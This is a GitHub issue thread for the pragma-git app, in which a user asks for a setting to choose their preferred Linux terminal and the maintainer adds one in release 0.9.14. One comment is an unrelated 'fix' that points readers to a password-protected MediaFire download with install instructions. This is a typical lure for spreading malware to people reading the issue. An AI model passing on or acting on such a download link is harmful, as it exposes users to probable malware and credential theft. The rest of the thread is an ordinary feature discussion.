### ISSUE TITLE
[enhancement]: Will you add a setting to choose favorite terminal?

### ISSUE THREAD

**Issue by zyppe** [pragma-git/pragma-git#8]
### The problem

I use openSUSE with KDE Konsole and wezterm, it only start xterm.

### The solution

Maybe in Linux it could just use like "xdg-terminal" or add a setting to choose.

### Alternatives

The library "terminal-tab" has been archived, is there any alternative library?

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by pragma-git** [comment]
Please describe the use case and how you envision using this from pragma-git application

**Comment by pragma-git** [comment]
Hi,

Could you inform me if the [xdg-terminal-exec](https://software.opensuse.org/package/xdg-terminal-exec) command works on openSUSE.

Call to users of all linux systems:
Please report of ` xdg-terminal-exec` command works, and state your system version

This may be a viable way to improve opening in the correct default terminal

Please comment to add any thoughts

**Comment by pragma-git** [comment]
The new 0.9.14 release introduces settings to allow your preferred **_terminal_**, and also **_file browser_**.

![New settings](https://github.com/user-attachments/assets/949b3582-c209-475a-b289-a5ed336c796c)

Please restart pragma-git, and follow the upgrade instructions.

Let me know if this solves the reported issue.

**Comment by zyppe** [comment]
That is great! I can use my konsole now!
